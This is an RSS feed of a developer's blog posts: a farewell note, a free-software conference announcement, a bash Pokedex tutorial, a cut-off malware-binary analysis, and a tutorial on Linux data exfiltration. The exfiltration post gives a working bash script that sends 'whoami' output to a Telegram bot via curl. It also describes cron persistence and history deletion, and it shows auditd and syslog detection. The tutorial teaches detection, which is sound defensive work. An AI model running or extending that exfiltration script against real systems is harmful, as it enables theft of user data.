<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: Paula</title>
    <description>The latest articles on Forem by Paula (@terceranexus6).</description>
    <link>https://forem.com/terceranexus6</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F14900%2Fc734e354-1a69-4bf6-8077-595da18db0a5.jpg</url>
      <title>Forem: Paula</title>
      <link>https://forem.com/terceranexus6</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/terceranexus6"/>
    <language>en</language>
    <item>
      <title>Bye bye!</title>
      <dc:creator>Paula</dc:creator>
      <pubDate>Thu, 03 Jul 2025 16:18:53 +0000</pubDate>
      <link>https://forem.com/terceranexus6/bye-bye-3d8p</link>
      <guid>https://forem.com/terceranexus6/bye-bye-3d8p</guid>
      <description>&lt;p&gt;Hello!&lt;/p&gt;

&lt;p&gt;I'm well aware this post might become an issue, so first of all I want to say thank you to all of you who have enjoyed my posts until now and commented and supported them. I'm truly grateful for that!&lt;/p&gt;

&lt;p&gt;It's been a while since I wrote and that's partly because I didn't feel like it. In my account I hold 18 badges, 8 from year commemorations and the rest from commit contribution (so I could add my mastodon account and so anyone could, it worked for a while and happy about that), "nevertheless she coded", writing strikes and more. I feel like a girl scout (jk, I love my badges)&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5xsz92meklaz4ftsx4he.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5xsz92meklaz4ftsx4he.gif" alt="gif of the Adams, Wednesday is asking if some cookies are made of actual girl scouts flesh" width="400" height="213"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I even helped with moderation for a while on my free time, just for the sake of this community because I really liked it and its people. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb0fzk0r3r6bvt1ooj925.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fb0fzk0r3r6bvt1ooj925.jpg" alt="Hand holding a cup that says nevertheless she coded" width="800" height="1063"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I started writing mostly to share my development in tech and security, I learned a lot from communities so I wanted to give something back. That, I keep doing in other places, too. I think we all need to share our knowledge to be better together. It might sound naive, and I'm well aware: it is not. Not everything needs to be a potential efficient product, and not everything, to be valuable and useful, needs to enroll a tech trend. I learned that mostly working with tech in the margins in my free time: limited resources for a local hackerspace, limited resources for schools, in a social radio station, tech for minorities, organizing free software events and more. Technology for communities works better in the long run (and for better purposes) when it's also community driven and multidisciplinary. Maybe slower? Maybe it takes more time? Sure, probably. Still, better.&lt;/p&gt;

&lt;p&gt;I recently heard the Cloudflare CEO speaking (&lt;a href="https://mobile.x.com/carlhendy/status/1938465616442306871" rel="noopener noreferrer"&gt;LINK&lt;/a&gt;, be aware this is an X/twitter link) about how AI bots and content are messing with content creators, those who wrote the actual information in the first place. He spoke from the visibility of his platform, but this is something many content creators (especially those who wrote or drew) were already saying. I've been visiting this place and recently wondered how many are truly people sharing and how many are automated SEO for visibility. Made me feel bitter about it.&lt;/p&gt;

&lt;p&gt;I'm also motivated by the climate impact of generative AI, which is apparently the favorite topic lately. It's no secret, it's already been said, researched and all. Some of us are even seeing our countries being the target for massive Data Centers (not regular ones) despite being heavily impacted by climate change (water availability issues, extreme heat, etc). I will leave the numbers to associations such as &lt;a href="https://tunubesecamirio.com/" rel="noopener noreferrer"&gt;Tu Nube Seca mi Rio&lt;/a&gt;, but you get the idea right?&lt;/p&gt;

&lt;p&gt;I got upset when I saw another community holding hands with trending-driven AI deals. It's not my call, and me leaving has no impact, it might even backfire. &lt;/p&gt;

&lt;p&gt;I really want to spend my time in digital spaces that will make me feel I'm doing my best, the best I can. I really don't want to put a single feather more on to the weight of the climate and technology mess that my daughter is going to inherit. &lt;/p&gt;

&lt;p&gt;I'm not nostalgic, I didn't have time to be (I'm only 29 hehe). I'm not naive, either, I've given my tech career time, and sacrifice in and out the working context. I've faced and fought misogyny in several digital and tech spaces so others didn't have to. Let me tell you, I've worked on my relationship with technology from several angles. &lt;/p&gt;

&lt;p&gt;I just believe tech communities can do better and I want to work towards that, as I've always done. Some years ago it was by working alongside the local Free Software Office, and now, 8 years later, I'm just advocating for the tech I believe in. &lt;/p&gt;

&lt;p&gt;As I've always done.&lt;/p&gt;

&lt;p&gt;I try to remember individual actions will only get you so far. I feel this decision is more of a collaboration to those communities who want to work towards permacomputing.&lt;/p&gt;

&lt;p&gt;Thanks for all these years of fun interactions and content sharing. I hope this letter is more of a warm goodbye rather than a bitter message. I'm proud of the DEVTO stickers I have on my laptop and I'm happy I've been around.&lt;/p&gt;

&lt;p&gt;Have a great day, reader (unless you are a bot hehe)&lt;br&gt;
Hugs&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F99kgl9cyp4ub43oj6ao2.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F99kgl9cyp4ub43oj6ao2.gif" alt="green puppet of a girl and her dog saying bye byee" width="480" height="370"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>bye</category>
      <category>opinion</category>
    </item>
    <item>
      <title>Preparing for esLibre</title>
      <dc:creator>Paula</dc:creator>
      <pubDate>Thu, 11 Apr 2024 15:48:45 +0000</pubDate>
      <link>https://forem.com/terceranexus6/preparing-for-eslibre-ep</link>
      <guid>https://forem.com/terceranexus6/preparing-for-eslibre-ep</guid>
      <description>&lt;p&gt;Next month, the 6th edition of &lt;a href="http://eslib.re" rel="noopener noreferrer"&gt;esLibre&lt;/a&gt; congress will occupy Las Naves, in Valencia (Spain), the May 24th and 25th. The event started in Granada, as the former local &lt;a href="https://osl.ugr.es/" rel="noopener noreferrer"&gt;Free Software Office&lt;/a&gt; responsible and university teacher, &lt;a href="https://dev.to/jj"&gt;JJ&lt;/a&gt;, pushed the idea into some of the people who were used to organize similar things (including myself). Since then, we've slowly created some traditions, such as celebrating the event in a different city each time, so communities and individuals all around Spain had the opportunity to assist at some point. This added a brand new layer of complexity, that included finding local communities aiming to help us, or understanding the context of each new emplacement to adapt the event to it.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fydo4e194f2vipnaf7hny.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fydo4e194f2vipnaf7hny.png" alt="logo of eslibre, which is an stylized penguin in a red background, it says eslibre and the dates mentioned above" width="800" height="266"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Each year, the organization, as well as the event itself, is different. Yet, we try to keep some common ground: free culture, diversity awareness and recognition to both technical and non-technical skills that keep the free software culture rolling. We had our issues through the peak of the pandemic years, but we are trying to slowly (and safely) come back to what it used to be. This year we are humbled to also share our event with KDE España and their Akademy congress, as well as a room for Wikimedia and a DEVROOM for academic free software discussions, among all the talks, workshops and short talks.&lt;/p&gt;

&lt;p&gt;As we are escalating, we decided to reserve a short space for a round table on "Organizing a free software event" which is meant for others to have a guide based on how we do it, answering questions and more. I will try to share the key points over here afterwards.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft95v09pokbaz292lxbrm.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft95v09pokbaz292lxbrm.gif" alt="penguins running, a gif" width="480" height="270"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After receiving a great amount of proposals (even more than the last years) we are trying to put it all together and soon we will publish the final schedule. In the meantime, you all can see &lt;a href="https://gitlab.com/eslibre/propuestas/-/merge_requests?scope=all&amp;amp;state=all" rel="noopener noreferrer"&gt;the proposals themselves&lt;/a&gt;, as they are automated to go from the form to a pull request in our repo to assure transparency in the voting and commenting period.&lt;/p&gt;

&lt;p&gt;Every year I feel astonished by the amount of people willing to either help, participate or assist, just to talk and discuss free software and their communities. I recently read a really sad header somewhere saying "are free software communities dying?" let me tell you: they are not, since I see it. Even when things seem rough in the tech world, there's someone out there willing to create code for others, just because. Or translating documentation, so it's more accessible. Or thinking of ways the software could look better, more intuitive. I know a lot of people came around to the idea this exists and that's it. I pretty much myself became an actual adult through university having my hand held by these sorts of communities, and ten years later I keep feeling surrounded by it. I should be the one more used to this, but I'm not, I keep feeling grateful and surprised.&lt;/p&gt;

&lt;p&gt;Here, look for us in:&lt;/p&gt;

&lt;p&gt;Telegram: &lt;a href="https://t.me/esLibre" rel="noopener noreferrer"&gt;https://t.me/esLibre&lt;/a&gt;&lt;br&gt;
Mastodon: &lt;a href="https://floss.social/@eslibre/" rel="noopener noreferrer"&gt;https://floss.social/@eslibre/&lt;/a&gt;&lt;br&gt;
Gitlab: &lt;a href="https://gitlab.com/eslibre" rel="noopener noreferrer"&gt;https://gitlab.com/eslibre&lt;/a&gt;&lt;br&gt;
Twitter: &lt;a href="https://twitter.com/esLibre_" rel="noopener noreferrer"&gt;https://twitter.com/esLibre_&lt;/a&gt;&lt;/p&gt;

</description>
      <category>eslibre</category>
      <category>fs</category>
      <category>community</category>
    </item>
    <item>
      <title>Linux Exfiltration</title>
      <dc:creator>Paula</dc:creator>
      <pubDate>Wed, 20 Mar 2024 17:13:33 +0000</pubDate>
      <link>https://forem.com/terceranexus6/linux-exfiltration-1fci</link>
      <guid>https://forem.com/terceranexus6/linux-exfiltration-1fci</guid>
      <description>&lt;p&gt;One of the most prominent threats right now is Infostealers. These would be a kind of malware that captures information from devices and sends the stolen data to an attacker. While this technique is integrated in other attacks (f.e. ransomware) it could work on its own, for selling, cyber espionage and more. &lt;/p&gt;

&lt;p&gt;In the past months, one of the most popular exfiltration attempts was done through  Telegram or Discord bots (as well as C2-Command and Control attempts). &lt;/p&gt;

&lt;p&gt;I've been asked a few times how this is done, so in this article, I'm creating a very simple example of how Telegram could be used to exfiltrate and how to detect that attempt. Let's go!&lt;/p&gt;

&lt;h2&gt;Telegram bot&lt;/h2&gt;

&lt;p&gt;In order to do this, a Telegram Bot and a Channel are required. You need to create a bot with the help of BotFather and then create a Channel and add the bot to it. Send a message to the Channel and then use the following to get the Channel info:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;https://api.telegram.org/bot&amp;lt;BotToken&amp;gt;/getUpdates
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;As described &lt;a href="https://hackernoon.com/how-to-create-a-simple-bash-shell-script-to-send-messages-on-telegram-lcz31bx" rel="noopener noreferrer"&gt;here&lt;/a&gt;, this will allow you to get the Channel ID. Once you know the channel ID, you can send a message using:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;curl 'https://api.telegram.org/bot&amp;lt;BotToken&amp;gt;/sendMessage?chat_id=&amp;lt;channelId&amp;gt;&amp;amp;text=&amp;lt;my message&amp;gt;'
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Understanding this, we could create a script that enumerates the system information and sends a message describing it. Let's create a really simple example that just sends the &lt;code&gt;whoami&lt;/code&gt; output for the sake of the example. Of course, this could include way &lt;a href="https://www.redhat.com/sysadmin/linux-system-info-commands" rel="noopener noreferrer"&gt;more things&lt;/a&gt; such as architecture, disk info and more. Most of these sorts of samples will also attempt to check crypto wallet info.&lt;/p&gt;

&lt;p&gt;Anyway, let's say we have the following script:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;#!/bin/bash

messa=$(whoami)
mycommand="https://api.telegram.org/bot&amp;lt;BotToken&amp;gt;/sendMessage?chat_id=&amp;lt;channelId&amp;gt;&amp;amp;text=$messa"

curl $mycommand

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8cxftrngwvhro5y19x2t.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8cxftrngwvhro5y19x2t.gif" alt="The Office character shushing as saying a secret" width="480" height="270"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;When this is executed, the username is sent to the channel.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fty1xbwc9esajg7iy9kct.gif" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fty1xbwc9esajg7iy9kct.gif" alt="name popping up in the channel" width="221" height="80"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now, most of these will install the script in &lt;code&gt;cron&lt;/code&gt; using &lt;code&gt;crontab&lt;/code&gt; and delete the &lt;code&gt;history&lt;/code&gt; log.&lt;/p&gt;

&lt;p&gt;In case the &lt;code&gt;crontab&lt;/code&gt; log is still intact, we will be able to see the crontab edition using &lt;code&gt;cat /var/log/syslog | grep -w 'crontab'&lt;/code&gt;. But let's explore a cool option: &lt;code&gt;auditd&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Now, installing &lt;code&gt;auditd&lt;/code&gt; is &lt;a href="https://www.redhat.com/sysadmin/configure-linux-auditing-auditd" rel="noopener noreferrer"&gt;fairly simple&lt;/a&gt;. And while you can create your own rules, you can also use a &lt;a href="https://gist.github.com/Neo23x0/9fe88c0c5979e017a389b90fd19ddfee" rel="noopener noreferrer"&gt;default configuration&lt;/a&gt; and you are good to go!&lt;/p&gt;

&lt;p&gt;Now, if we use &lt;code&gt;sudo cat /var/log/audit/audit.log | grep telegram | grep api&lt;/code&gt; we would be able to see the attempt of our script!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjzt6y29ya3fx7yg4j0h6.jpg" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjzt6y29ya3fx7yg4j0h6.jpg" alt="Image description" width="800" height="30"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Sometimes these attacks include messing up the &lt;code&gt;/var/log&lt;/code&gt; so maybe having a backup in a different path could be useful, too. &lt;/p&gt;

&lt;p&gt;Anyway, this was a simple, friendly introduction. Expect more complex attacks! (and simpler, too :) ) &lt;/p&gt;

&lt;p&gt;If you are curious about analyzing real life samples, take a look at my older posts about &lt;a href="https://dev.to/terceranexus6/the-broken-spaceship-honeypot-updates-5gk8"&gt;setting a custom Linux Honeypot&lt;/a&gt;. Most of the things I capture are miners, which could use some common characteristics with info-stealers (messing up with &lt;code&gt;cron&lt;/code&gt; for persistence, attempting enumeration, attempting &lt;a href="https://attack.mitre.org/techniques/T1574/006/" rel="noopener noreferrer"&gt;Dynamic Linker Hijacking&lt;/a&gt; attack, and more). &lt;/p&gt;

</description>
      <category>noai</category>
      <category>security</category>
      <category>linux</category>
    </item>
    <item>
      <title>Creating a Linux Terminal Pokedex</title>
      <dc:creator>Paula</dc:creator>
      <pubDate>Tue, 09 Jan 2024 16:41:48 +0000</pubDate>
      <link>https://forem.com/terceranexus6/creating-a-linux-terminal-pokedex-1oa0</link>
      <guid>https://forem.com/terceranexus6/creating-a-linux-terminal-pokedex-1oa0</guid>
      <description>&lt;p&gt;I recently found an &lt;a href="https://pokeapi.co/" rel="noopener noreferrer"&gt;API for Pokemon&lt;/a&gt; and I wrote a simple Pokedex for fun using the data available.&lt;/p&gt;

&lt;p&gt;The API is pretty straightforward: you give it the ID or name of a Pokemon, and it gives you back information in a &lt;code&gt;json&lt;/code&gt; file. I used &lt;code&gt;bash&lt;/code&gt; and &lt;code&gt;jq&lt;/code&gt; to parse the information.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;curl -s https://pokeapi.co/api/v2/pokemon/&amp;lt;my pokemon&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;So, imagine we want to get the type of the Pokemon. Taking a quick look at the &lt;code&gt;json&lt;/code&gt;, I check where the type is and then write:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;strings $mipoke.json | jq -r '.types[].type.name'
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Where &lt;code&gt;$mipoke&lt;/code&gt; is the Pokemon name. Some of them have two types so I save them in variables and check the existence of the second one:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;first_type=$(strings $mipoke.json | jq -r '.types[0].type.name')
second_type=$(strings $mipoke.json | jq -r '.types[1].type.name')


if  [ -z "$second_type" ]; then
      echo -e "$second_type"
fi
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I thought it would be fun to set colors according to the type, so I created a palette in the header:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;export COLOR_NC='\e[0m' # No Color

export COLOR_BLACK='\e[0;30m'
export COLOR_GRAY='\e[1;30m'
export COLOR_RED='\e[0;31m'
export COLOR_LIGHT_RED='\e[1;31m'
export COLOR_GREEN='\e[0;32m'
export COLOR_LIGHT_GREEN='\e[1;32m'
export COLOR_BROWN='\e[0;33m'
export COLOR_YELLOW='\e[1;33m'
export COLOR_BLUE='\e[0;34m'
export COLOR_LIGHT_BLUE='\e[1;34m'
export COLOR_PURPLE='\e[0;35m'
export COLOR_LIGHT_PURPLE='\e[1;35m'
export COLOR_CYAN='\e[0;36m'
export COLOR_LIGHT_CYAN='\e[1;36m'
export COLOR_LIGHT_GRAY='\e[0;37m'
export COLOR_WHITE='\e[1;37m'
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And then I created a basic conditional to set the color for the types:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# initializing color variables
color1="${COLOR_WHITE}"
color2="${COLOR_WHITE}"
...
#creating a function so I don't 
#commit redundancy in both types
check_colors() {
tipo=$1
color="${COLOR_WHITE}"

if [[ "$tipo" = "fairy" || "$tipo" = "psychic" ]]; then
        color="${COLOR_LIGHT_PURPLE}"
elif [[ "$tipo" = "steel" || "$tipo" = "normal" ]]; then
        color="${COLOR_LIGHT_GRAY}"
elif [[ "$tipo" = "grass" || "$tipo" = "bug" ]]; then
        color="${COLOR_GREEN}"      
elif [[ "$tipo" = "water" || "$tipo" = "ice" ]]; then
        color="${COLOR_BLUE}"
elif [ "$tipo" = "poison" ]; then                           
        color="${COLOR_PURPLE}"
elif [ "$tipo" = "electric" ]; then
        color="${COLOR_YELLOW}"

fi

echo "$color"
}
...
#setting the color for the first type
color1="$(check_colors "$first_type")"

#if second type exists (jq -r prints "null" when it doesn't), setting the color, too
if [ -n "$second_type" ] &amp;amp;&amp;amp; [ "$second_type" != "null" ]; then
      color2="$(check_colors "$second_type")"
      echo -e "$color2 $second_type ${COLOR_NC}"
fi

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Now the next two interesting things might be moves and abilities. I realized in a quick test that moves are too many, so I opted for showing a small sample and saving all the rest in a different file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;strings $mipoke.json | jq -r '.moves[].move.name' | head -n5
echo -e "...\nCheck the whole list in the file $mipoke.moves"
strings $mipoke.json | jq -r '.moves[].move.name' &amp;gt;&amp;gt; $mipoke.moves
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Abilities aren't usually too many, so I kept them simple:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;strings $mipoke.json | jq -r '.abilities[].ability.name'
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;I decided I wanted to do a charming detail so I captured the weight:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;weight=$(strings $mipoke.json | jq -r '.weight')
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Converted it to kg (it's in lbs):&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;inkg=$(bc &amp;lt;&amp;lt;&amp;lt; "scale=2; $weight*0.45")
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And then use it in a conditional so to give advice on how to handle the Pokemon:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;inkg_int=$(bc &amp;lt;&amp;lt;&amp;lt; "$inkg/1")
inkg_int=$(($inkg_int))

if [[ "$inkg_int" -lt 35 &amp;amp;&amp;amp; "$inkg_int" -gt 10 ]]; then
        consejo="That means you can carry it for a while, but you can hurt your back! Let them walk"
elif [[ "$inkg_int" -lt 11  &amp;amp;&amp;amp; "$inkg_int" -gt 5 ]]; then
        consejo="That means your pokemon is quite light and you might be able to carry it around a lot."
elif [ "$inkg_int" -lt 6 ]; then
        consejo="That means your pokemon is very light, tiny cute baby, and you might even be able to carry it around in a bag, if it pleases them."
elif [[ "$inkg_int" -lt 60  &amp;amp;&amp;amp; "$inkg_int" -gt 34 ]]; then
        consejo="Your pokemon weighs like a human teen or an adult even, so try to look for ways of taking care of them without carrying it too much unless you want to hurt your back!"
elif [[ "$inkg_int" -lt 200  &amp;amp;&amp;amp; "$inkg_int" -gt 59 ]]; then
        consejo="Your pokemon might be a little bit too heavy for carrying it, so don't attempt to do it. Nevertheless look for alternatives such as patting and saying nice words."
else
        consejo="Your pokemon is a thicc baby, they won't expect you to carry it. But they will probably like pats and nice words."
fi

echo "$consejo"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;It was pretty much done. I added some visual details (further colors, sparkles) and the possibility of tooting in your mastodon the final information. For that I duplicated every print into a file and then:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;read -p"Do you want to toot it? y/n: " ANS

if [[ "$ANS" = "y" || "$ANS" = "Y" ]]; then
        toot post "$(strings mytoot)"
else
        echo "okay, not tooting!"
fi

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And that's it!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8by6pirw4u2nzb0wj5yn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F8by6pirw4u2nzb0wj5yn.png" alt="capture of the pokedex" width="582" height="561"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5ffgojmclt9tnkvajv1x.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5ffgojmclt9tnkvajv1x.png" alt="capture of the pokedex" width="229" height="394"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Here's the &lt;a href="https://git.sr.ht/~alienagain/terminal_simple_pokedex" rel="noopener noreferrer"&gt;repo&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>pokemon</category>
      <category>linux</category>
      <category>bash</category>
    </item>
    <item>
      <title>Analyzing a Linux malware binary</title>
      <dc:creator>Paula</dc:creator>
      <pubDate>Tue, 19 Dec 2023 14:16:10 +0000</pubDate>
      <link>https://forem.com/terceranexus6/analyzing-a-linux-malware-binary-4b2g</link>
      <guid>https://forem.com/terceranexus6/analyzing-a-linux-malware-binary-4b2g</guid>
      <description>&lt;p&gt;I encountered an interesting file in my honeypot a couple of days ago and it's not on virustotal or similar so I decided to take advantage of the situation a take a closer look myself.&lt;/p&gt;

&lt;p&gt;Before going further let me tell you I'm not whatsoever a reversing expert, just a messy curious threat intel/threat hunting expert, and this article was a for-fun activity. I do like it and I wish I could properly do reversing! Someday, maybe. &lt;/p&gt;

&lt;p&gt;The attacker uploaded the file through sftp:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff73zx7viw1vc1na49zi4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ff73zx7viw1vc1na49zi4.png" alt="Image description" width="262" height="33"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Before anything else I used radare2 so to get some general info about the file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;rabin2 -I mymalware
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And found out the following things:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;arch     x86
baddr    0x400000
binsz    30048232
bintype  elf
bits     64
canary   false
injprot  false
class    ELF64
crypto   false
endian   little
havecode true
intrp    /lib64/ld-linux-x86-64.so.2
laddr    0x0
lang     c
linenum  false
lsyms    false
machine  AMD x86-64 architecture
nx       true
os       linux
pic      false
relocs   false
relro    partial
rpath    NONE
sanitize false
static   true
stripped true
subsys   linux
va       true
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And:&lt;br&gt;
